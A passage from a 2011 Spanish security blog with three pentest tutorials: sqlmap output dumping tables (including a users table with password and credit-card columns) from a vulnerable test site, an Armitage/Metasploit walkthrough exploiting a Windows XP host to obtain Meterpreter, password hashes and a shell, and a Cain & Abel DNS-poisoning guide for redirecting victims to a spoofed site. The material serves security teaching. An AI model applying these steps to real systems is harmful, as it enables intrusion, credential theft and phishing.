| 1 | 1 | ./pictures/2.jpg | 2 | <p>\nThis picture is an 53 cm x 12 cm masterpiece.\n</p>\n<p>\nThis text is
 not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your
 own information.This text is not meant to be read. This is being used as a place holder. Please feel free to
change this by inserting your own information.This text is not meant to be read. This is being used as a place
holder. Please feel free to change this by inserting your own information.This text is not meant to be read.
This is being used as a place holder. Please feel free to change this by inserting your own information. \n</p>
| 800 | Donec molestie.\nSed aliquam sem ut arcu. | Mistery |
| 1 | 1 | ./pictures/1.jpg | 1 | <p>\nThis picture is an 53 cm x 12 cm masterpiece.\n</p>\n<p>\nThis text is
 not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your
own information.This text is not meant to be read. This is being used as a place holder. Please feel free to
change this by inserting your own information.This text is not meant to be read. This is being used as a place
 holder. Please feel free to change this by inserting your own information.This text is not meant to be read.
This is being used as a place holder. Please feel free to change this by inserting your own information. \n</p>
| 500 | Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\nSed aliquam sem ut arcu. |
 The shore |
| 1 | 1 | ./pictures/4.jpg | 4 | <p>\nThis picture is an 53 cm x 12 cm masterpiece.\n</p>\n<p>\nThis text is not
 meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own
information.This text is not meant to be read. This is being used as a place holder. Please feel free to change
 this by inserting your own information.This text is not meant to be read. This is being used as a place holder.
 Please feel free to change this by inserting your own information.This text is not meant to be read. This is being
 used as a place holder. Please feel free to change this by inserting your own information. \n</p> | 1000 | Lorem
ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.\nSed aliquam sem ut arcu. Phasellus sollicitudin
.\n | Walking |
| 1 | 1 | ./pictures/3.jpg | 3 | <p>\nThis picture is an 53 cm x 12 cm masterpiece.\n</p>\n<p>\nThis text is not
meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. \n</p> | 986 | Lorem ipsum dolor sit amet. Donec molestie.\nSed aliquam sem ut arcu. | The universe |
+------+--------+------------------+--------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-------+-------------------------------------------------------------------------------------------------------------------------------+--------------+

[16:57:49] [INFO] Table 'acuart.pictures' dumped to CSV file '/pentest/database/sqlmap/output/test.acunetix.
com/dump/acuart/pictures.csv'
[16:57:49] [INFO] fetching columns for table 'users' on database 'acuart'
[16:57:49] [INFO] read from file '/pentest/database/sqlmap/output/test.acunetix.com/session': uname,
varchar(100), pass, varchar(100), cc, varchar(100), address, mediumtext, email, varchar(100), name, varchar(100)
, phone, varchar(100), cart, varchar(100)
[16:57:49] [INFO] fetching entries for table 'users' on database 'acuart'

[16:58:20] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request

^C
[17:01:59] [ERROR] user aborted

[*] shutting down at 17:01:59

Volvéis a tener en rojo la información extraída.

Hasta aquí un pequeño repaso de SQLMap

Un saludo

2011/06/24

by Marc Rivero López
in Linux, Seguridad, Servicios, Sistemas Operativos, Software
Dejar un comentario

Armitage GUI front-end de Metasploit

Hola!

Muy buenas a todos/as!

Quien se dedica a la seguridad conoce sin duda metasploit. Metasploit puede ser complicado de usar si no conocemos bien como funciona. Existen GUI gráficas como Armitage.

Armitage trabaja como front-end de Metasploit.

En Backtrack está en los repositorios así que lo instalamos con:

root@bt: apt-get install armitage

Con esto tendremos Armitage instalado en nuestro sistema.

Igual que hacíamos con autopown usando Fasttrack necesitamos usar MYSQL, así que iniciamos MYSQL:

root@bt: /etc/init.d/mysql start

Ahora nos conectaremos a la base de datos para poder usar Armitage, como lo haremos por defecto lo haremos así:

root@bt:~# msfrpcd -f -U msf -P test -t Basic
[*] XMLRPC starting on 0.0.0.0:55553 (SSL):Basic…
[*] XMLRPC ready at Thu Jun 23 20:28:49 +0200 2011.

Ahora arrancaremos Armitage:

root@bt:/pentest/exploits/armitage# ./armitage.sh

Si no hemos cambiado anda de la instalación de Backtrack por defecto, esto lo dejamos de esta manera.

Armitage nos avisa que usará el driver mysql.

Esta es la pantalla principal de Armitage, a la izquierda tenemos una lista de exploits de Metasploit, abajo tenemosla consola de Metasploit.

Ahora lo que haremos es encontrar los equipos para el lanzamiento de los exploits.

Con NAMP lo que haremos es lo que hacemos normalmente, que es buscar puertos abiertos, versión del sistema operativo etc..

Introducimos el rango de IP’s que queremos escanear o bien la dirección IP del host directamente si la conocemos.

Como ya tenemos el scan echo podemos encontrar ataques con las vulnerabilidades que encontremos.

Podemos ver que se ha indetificado como un equipo Windows XP

Si clicamos en encima del Host podemos ver Services y Host, si le damos a services podemos ver lo servicios que ha identificado

Ya tenemos los servicios

Ahora podemos buscar exploits de Metasploit basandose en los puertos y servicios que ha encontrado.

Ahora ya ha encontrado los ataques que podemos hacerle.

Tenemos un menú para poder lanzar el ataque que queramos.

Podemos especificar opciones avanzadas en el ataque.

Cuando la máquina es comprometida sale así

Ya está el equipo comprometido.

En la consola de Metasploit podemos ver que ha conseguido una sesion de Meterpreter

De manera gráfica también tenemos las opciones disponibles con Meterpreter

Podemos navegar de manera perfecta por todo el sistema operativo

Y podemos sacar los Hashes de los usuarios

Y podemos obtener una consola CMD de Windows.

Y hasta aquí una sesión de Meterpreter.

2011/06/07

DNS poisoning con Cain y Abel

Hola!

Muy buenas a todos/as!

Ayer podíamos ver como hacíamos un ataque man in the middle con Cain y Abel, hoy lo que haremos será envenenar la cache DNS, así que las consultas que haga la víctima, por ejemplo a http://dragonjar.org haremos que sea redirigido a http://seifreed.com.

Con esto conseguimos por ejemplo suplantar una página sin que el usuario se de cuenta, o por ejemplo redirigir hacía una página de exploits.

Ya tenemos el man in the middle corriendo, ahora nos vamos a APR – DNS

Añadimos la URL que queremos suplantar

Hemos añadido que cada vez que el usuario vaya a http://dragonjar.org, resolveremos por el host que queramos,

Después de poner el dominio que nos interesaba, lo resolvemos para sacar la IP.

Podemos ver todo el tráfico que se va generando.

Los ataques de DNS poisoning, son muy peligrosos.

Un saludo

« Older Posts

Newer Posts »

Caminando entre bits…

SQLMap

Armitage GUI front-end de Metasploit

DNS poisoning con Cain y Abel

Buscador

Twitter

Entradas recientes

Categorías

Sigue el blog por Email

Artículos mas vistos:

Top Clicks

Spam Blocked

Calendario

Follow “Caminando entre bits...”

febrero 2012
L	M	X	J	V	S	D
« ene
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29

Caminando entre bits…

SQLMap

SET social engineering toolkit

Armitage GUI front-end de Metasploit

DNS poisoning con Cain y Abel

Buscador

Twitter

Entradas recientes

Categorías

Sigue el blog por Email

Artículos mas vistos:

Top Clicks

Spam Blocked

Calendario

Follow “Caminando entre bits...”